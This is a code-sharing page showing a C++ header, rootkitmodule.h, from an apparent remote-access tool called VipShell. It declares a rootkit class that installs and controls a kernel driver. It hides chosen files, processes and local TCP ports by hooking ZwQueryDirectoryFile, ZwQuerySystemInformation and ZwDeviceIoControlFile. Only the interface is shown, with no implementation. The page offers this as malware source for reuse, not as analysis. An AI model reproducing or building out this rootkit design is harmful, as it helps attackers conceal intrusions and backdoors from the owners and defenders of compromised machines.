📄 rootkitmodule.h

📁 VipShell驱动隐藏模块

💻 H

字号:

#pragma once
#include <string>
#include "../I_RootKitModule.h"



class CRootKitModule :
	public CPinboard
{
	COMPONENT_INSTANCE_PINBOARD(CRootKitModule)
public:
	virtual void Test() ;
public:
	//实现接口..
	virtual bool CreateDriver(LPCSTR szFileName, LPCSTR szDriver); 
	virtual bool StartDriver() ; 
	virtual bool StopDriver();  
	virtual bool DeleteDriver(LPCTSTR szDriver = NULL);

	virtual bool AddHideFile(LPCTSTR szFile);  //添加一个隐藏文件  最多10 个
	virtual bool DelHideFile(LPCTSTR szFile);  //取消隐藏一个文件
	virtual bool StartHideFile();              //开始HOOK ZwQueryDirectoryFile

	virtual bool AddHideProcessId(DWORD dwId);        //添加 隐藏一个进程 最多10 个
	virtual bool DelHideProcessId(DWORD dwId);        //取消隐藏一个进程
	virtual bool StartHideProcess();                     //开始HOOK ZwQuerySystemInformation

	virtual bool AddHidePort(DWORD dwPort);             //隐藏一个 本地TCP端口 最多10 个
	virtual bool DelHidePort(DWORD dwPort); //delete
	virtual bool StartHidePort();                  //HOOK ZwDeviceIoControlFile
protected:
	BOOL StopService(SC_HANDLE hSCManager, LPCTSTR ServiceName);
	BOOL StartService(SC_HANDLE hSCManager, LPCTSTR ServiceName);
	BOOL InstallService(SC_HANDLE hSCManager, LPCTSTR ServiceName, LPCTSTR ServiceExe);
	BOOL RemoveService(SC_HANDLE hSCManager, LPCTSTR ServiceName);

	HANDLE _CreateFile();
protected:
	SC_HANDLE m_hSCManager;
	std::wstring m_strDriverName;
};

💿 文件大小 13 K

👤 上传用户 flashlee2003200

📂 所属分类其他

🏷️ 相关标签

#VipShell #驱动 #模块

⌨️ 快捷键说明

复制代码 Ctrl + C

搜索代码 Ctrl + F

全屏模式 F11

切换主题 Ctrl + Shift + D

显示快捷键 ?

增大字号 Ctrl + =

减小字号 Ctrl + -